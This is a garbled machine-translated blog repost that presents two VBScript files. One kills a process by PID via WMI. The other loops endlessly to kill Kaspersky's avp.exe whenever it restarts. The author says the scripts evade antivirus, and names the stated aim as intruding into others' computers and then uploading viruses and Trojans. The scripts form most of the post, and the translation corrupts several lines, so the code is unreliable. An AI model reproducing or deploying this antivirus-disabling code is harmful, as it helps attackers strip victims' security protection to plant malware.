Two simple vbs scripts are used to end the process and prevent the process from being started.
Source: Internet
Author: User
No class this afternoon, hide in private Space Start to think about some problems. When browsing vbs-related cases, I wrote two small Program Come out, there is a hack (in fact, as long as you can "take a knife to kill", what Software No Hacker Nature? --!). Kill. vbs is used to end the process in cmd, And dis. vbs is used to prevent a process from starting again in window mode. Neither of these two vbs will be killed by anti-virus software, and there will be some concealment ...... View Code ! ('As a comment)
Kill. vbs:
For each PS in GetObject _
("Winmgmts :\\\ Root \ cimv2: win32_process"). Instances _ 'involves WMI script intrusion Technology , I cannot explain it clearly!
If ps. Handle = wscript. Arguments (0) then ', determine whether the PID Number of the process is equal to the obtained PID Number parameter.
Wscript. Echo ps. terminate' terminate the process corresponding to the specified PID if they are equal
End if
Next
Dis. vbs
Dim y, x'. Do not use this line ......
Do's an endless loop ...... I am still judging! Do... loop is the loop body!
Set y = GetObject ("winmgmts: \. \ Root \ cimv2") 'is the same as described above, which also involves Microsoft WMI Technology!
Set x = y. EXE Cquery ("select * From win32_process where name1_'avp.exe '")
'Query the sentence, and check if wheresuffix avp.exe (Kabbah) exists in the process!
'In this way, when Kabbah is terminated by kill. vbs above, it will no longer start. Unless dis. vbs is ended first ......
For each I in X
I. Terminate () 'kabbah will be terminated immediately after it is started ......
Next
Wscript. Sleep
Loop
The explanation is clear enough. Let's see how these two vbs work. I put kill. vbs and DIS. vbs in the C root directory.
Open cmd, enter CD \ to return to the C root directory, and enter tasklist to view the current System Then write down the PID of the process you want to kill, and enter cscript kill. vbs 2200 to end the process whose PID is 2200! If this process is avp.exe, you can enter dis. vbs to start dis. vbs to prevent Kabbah from being started. When dis.vbsis started, only the wscript.exe process item is included in the task manager's process. If the process is not terminated, it cannot start Kabbah again.
Understanding this and intruding others in the future Computer Post-upload virus, Trojan And so on ...... All the above processes have been successfully tested by myself. Continue to improve ......
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.
